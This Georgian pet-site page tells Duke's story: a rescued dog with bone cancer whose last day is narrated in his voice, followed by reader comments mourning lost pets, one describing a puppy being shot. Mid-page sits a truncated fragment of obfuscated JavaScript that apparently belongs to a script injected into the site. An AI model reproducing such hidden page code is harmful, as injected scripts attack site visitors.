"ამ დღეს მე მოვკვდი"
"ამ დღეს მე მოვკვდი"
რობერტსის ოჯახმა იცოდა, რომ საყვარელი ძაღლის დიუკის დაძინება მოუწევდათ. მათ არჩევანი არ ჰქონდათ - კიბო პროგრესირებდა.

თავის დროს ჯორდან რობერტსმა დიუკი გადაარჩინა. ძაღლი ცხოველების თავშესაფარში იმ ძაღლთა ჩამონათვალში შედიოდა, რომელთაც აძინებდნენ: დიდი, შავი და ასაკოვანი ძაღლი. ასეთები პრაქტიკულად არავის მიყავს სახლში. მაგრამ დიუკს საოცრად გაუმართლა - ის ჯორდანმა დაინახა.

რამოდენიმე წლის შემდეგ ძაღლს წინა მარჯვენა თათზე ოსტეოსარკომა აღმოაჩნდა. ეს ფაქტობრივად ავთვისებიანი სიმსივნეა, რომელიც ძვალში ვითარდება. თათი მოაჭრეს, მაგრამ დაავადება პროგრესირებდა და ცხოველი დიდ ტკივილს განიცდიდა.

გადაწყდა, რომ ჯორდანი 7 ივნისს უნდა
დაეძინებინათ. ამ პროცესამდე ოჯახმა გადაწყვიტა თავისი საყვარელი ბინადრისთვის
საუკეთესო გაცილება მოეწყო. მათ ფოტოგრაფ რობინ აროუტის საუკეთესო მეგობრის ბოლო დღის გადაღება სთხოვეს.
_ _ _


Zooclub
"ო, იმდენი ჰამბურგერი მივირთვი! ჩვენ ნამდვილი საღამო გვქონდა.

Zooclub
და მე ვიცინოდი.

Zooclub
ვფიქრობდი იმაზე, თუ როგორ მომენატრებოდა აქაურობა.

Zooclub
ჩვენ ბევრს ვხუმრობდით...

Zooclub
ჩვენ ვიყავით სერიოზულები.

Zooclub
ჩემი მეზობლები მოვიდნენ ჩემს სანახავად. ისინი ტყუპები არიან. როდესაც ვიღაცამ ერთ-ერთ მათგანს ჩემი ჰამბურგერი შესთავაზა მან უპასუხა: “არა, გმადლობ, არ მინდა დიუკს რამე წავართვა”.


Zooclub
კრისტენიც კი მოვიდა ჩემს სანახავად. ის ისეთი მხიარულია. კრისტენი ჩემი გრუმერი და მეგობარია.
Zooclub


Zooclub


როდესაც ჩვენ ვეტერინარს ველოდით, კრისტენმა თქვა, რომ ჩვენ სასეირნოდ წავალთ. მერე ვიღაცამ შემოგვთავაზა ქუჩის ბოლოს აკვაპარკთან ჩავსულიყავით და ყველანი იქით გავეშურეთ!

Zooclub

“შენ ხომ იცი, რომ ძალიან მომენატრები?!”


Zooclub
“შენც ძალიან მომენატრები”


Zooclub
“მე მინდა, რომ შენ ჩემს ოჯახს მიხედო.”

Zooclub
“გესმის? ეს ყველაფერია, რაც უნდა მეთხოვა”.

Zooclub
ხო, დღეს ჩვენ გვარიანად დავსველდით.

Zooclub
და ვიღიმებოდით.

Zooclub
ჩვენ მადლობელნი ვიყავით ამ დღისთვის.

Zooclub
დღეს ჩვენ დავარღვიეთ წესები.

Zooclub
ვუსმენდი სადღაც ახლოს, როგორ თამაშობდნენ ბავშვები და ვფიქრობდი ჩემს მეგობრებზე, რომლებიც სახლში დარჩნენ. მომწონდა მათი დაცვა.

Zooclub
სრულიად მშვიდად ვიყავი.

Zooclub
არ ვგრძნობდი ტკივილს, თუმცა, სიმსივნე დიდი იყო.

Zooclub
დღეს მხოლოდ სიყვარულს ვგრძნობდი.

Zooclub
ვემშვიდობებოდი ჩემს უსაყვარლეს მეგობარ კირას. ის თითქოს ხედავდა, როგორ დავფრინავდი მათ თავზე წამებით ადრე, ვიდრე ექიმმა თქვა, რომ დრო მოვიდა. აღელვებული და ბედნიერი ვიყავი.


Zooclub
არ მითქვამს “მშვიდობით”. მე ვთქვი: “ნახვამდის”.

Zooclub
ღმერთო, მე ბედნიერი ძაღლი ვიყავი. ჩვენ ერთად ცოტა დრო გავატარეთ, მაგრამ ეს დრო დაუვიწყარი იყო. თქვენ მეორე შანსი მომეცით და ერთად გავიარეთ ეს ყველაფერი.

მუდამ ვიზრუნებ თქვენზე.

მარად თქვენი
დიუკი”


// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
ნანა-ს
ასე არ მოქცე ნანა, თავიდან მეც მიჭირდა, მას ვერ დაივიწყებ, გარდაუვალია, მაგრამ პირიქით, სხვა მიუსაფარი არსება გაზარდე... შენ კეთილშობლი ხარ და ეს შენი ვალია, ეს შეგიმსუბუქებს დარდს, დამიჯერე!
ნანა
მეც აღარ მინდა არაფერი...სიცოცხლის უსამართლობაში ვრწმუნდები....ის არსება რომელიც 14 წელი მახარებდა,მასთან ერთად ვიძინებდი და ვიღვიძებდი,რამდენიმე თვეში ან კვირაში მიმატოვებს>>არ ვიცი როგორ შევეგუო ამ ტკივილს..აღარ მინდა, რომ მოვიყვანო ეს ადამიანზე ერთგული არსებები სახლში
1234 -s
როგორ მესმის თქვენი, ერთი წელი შესრულდა რაც ჩემი ყურშა აღარ მყავს. ბოროტმა ადამიანმა მიზანმიმართულად მიუშვა მისკენ მანქანა, 12 წლის იყო, მაგრამ ჯერ კიდევ ყოჩარად, ერთი თვე წვალობდა, ბავშვივით ვუვლიდი მაგრამ ვერ გადავარჩინეთ. ცრემლების გარეშე ვერ ვიხსენებ, როგორ მენატრება ჩემი საბრალო ყურშა......
მაშიკო
დიუკი, მე ,,მაშიკო" ვარ, მე დღეს 3 მარტს მოვკვდი, 10 თვის ასაკში. 18 წლის ბიჭმა გამომასალმა სიცოცხლეს, თავში მესროლა ტყვია, ბევრი ვიწვალე, მაგრამ ახლა აღარაფერი მაწუხებს გარდა იმისა, რომ ვხედავ ჩემს გამზრდელებს, როგორ განიცდიან და ტირიან. მინდა ვანუგეშო, მაგრამ არ ვიცი როგორ, მე ხომ ჯერ პატარა ვარ. იმედია ერთმანეთს შევხვდებით და მასწავლი ბევრ რამეს. როგორი ბედნიერი ვიყავი ჩემს პატრონებთან, სადაც ჩემს გარდა უამრავი კატა და ძაღლი ცხოვრობდა, ყველა ჩემსავით ობოლი, ქუჩიდან მოყვანილი. აკლებული გვქონდა ცელქობით მთელი ეზო და სახლ-კარი, მაგრამ ჩემი პატრონები დედა-შვილი არ გვსჯიდნენ, მხოლოდ გვიხსნიდნენ როგორ მოვქცეულიყავით. თვითონაც ძალიან უჭირთ თავის გატანა, მაგრამ არსსოდეს მშივრებს არ გვტოვებდნენ. ძალიან მინდა რომ ცრემლიანი თვალები ავულოკო და დავამშვიდო. პატარა რომ ვიყავი ძალიან ავად გავხდით მეც და ჩემი ძამიკოც, მაშინაც ასე ტიროდნენ, ბოროტმა მეზობელმა დაგვიძახა და ძეხვი გვაჭამა (კი გამიკვირდა, სულ გვცემდა მათ ეზოში რომ შევდიოდით) არ გვშიოდა, მაგრამ რადგან კარგად მოგვექცა, გვინდოდა ჩვენს გვესიამოვნებინა მისთვის. ჩემი პატრონების მცდელობით მე გადავრჩი, ჩემი ძამიკო კი ვერა. დიდხანს ვიავადმყოფე, არაფერს არ მიშლიდნენ, ოთახებში თავისუფლად დავდიოდი, რბილ დინანზე ასვლასაც არ მიშლიდნენ. მერე, როცა მოვკეთდი და რამეს დავაშავებდი და დამტუქსავდნენ, აი, მაშინ ,,ვატერორებდი”, ,,მე რომ ავად ვიყავი!” ,,გავხდე ისევ ავად!” გაიცინებდნენ და მომეფერებოდნენ. ასეთ დროს გული სიხარულით მიცემდა, სულ თამაში და ხტუნაობა მინდოდა, დავერეოდი კატებს, ძაღლებს და ვყვიროდი; ,,ჩემზე მეტად თქვენ არ უყვარხართ!, მე ვარ პირველი!” ცოტა რომ მოვიზარდე ეზოს გარეთაც გავდიოდი, იქ სხვა ცხოველები და ფრინველებიც გავიცანი, მათთანაც ვთამაშობდი, განსაკითრებით მომწონდა ქათმებს რომ ,,დაჭერობანას” ვეთამაშებოდი, დავიჭერდი და გავუშვებდი, ახლა სხვას დავედევნებოდი, გეფიცებით, მეტს არაფერს ვუშავებდი. ქათმების პატრონი დედა-შვილს მოუვარდა ჩხუბით სახლში. ჩემმა პატრონმა სურათები გამოუტანა ჩემი, მე მზეზე ვარ წამოწოლილი, პატარა წიწილები კი ჩემთან ჩახუტებულები არიან, ის სურათიც აჩვენა კნუტები რომ ჩემს ზურგზე წვანან და უთხრა ,,მაშიკო ამათ არაფერს ერჩის და შენებს რამეს დაუშავებსო?” . მისი წასვის შემდეგ გულში ჩამიკრეს და მითხრეს: ,, სახლიდან გარეთ არ გახვიდე, იცოდე მოგკლავენო”. მე სიკვდილი რა იყო არ ვიცოდი, სახლიდან გარეთ არ მიშვებდნენ, სულ ჩაკეტილი ვიყავი, მერე ერთ დღეს მოვახერხე გაპარვა, ბაღში სამუშაოდ წასულ დედა-შვილს მინდოდა დავწეოდი და გზაში უცებ თავში საშინელი ტკივილი ვიგრძენი, გაუსაძლისი..... მერე ჩემს სხეულს ზევიდან დავცქეროდი, დავინახე ის ბიჭი ფეხს როგორ ურტყამდა ჩემს უსულო სხეულს, მერე იმ მოჩხუბარი ქალის ხმა გავიგე, ,,თოფი შეტანე სახლში და ეს ლეში სადმე გადააგდეო”. დავინახე ტირილით როგორ მოვარდნენ ჩემი პატრონები, როგორ იხუტებდნენ ჩემს სისხლიან სხეულს და ეფერებოდნენ, ძალიან, ძალიან შემეცოდნენ გევედრები, მასწავლე დიუკი, როგორ დავამშვიდო, როგორ ვუთხრა მადლობა, იმ ხანმოკლე, მაგრამ ძალიან, ძალიან ბედნიერი დღეებისთვის......
1234
23-02-2016 წ, მომიკვდა 11წლის3თვის გერმანული ნაგაზი,ახლა ტკივილი გამიასმაგდა,ძალიან განვიცდი,უბრალოდ ცუდად ვარ
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?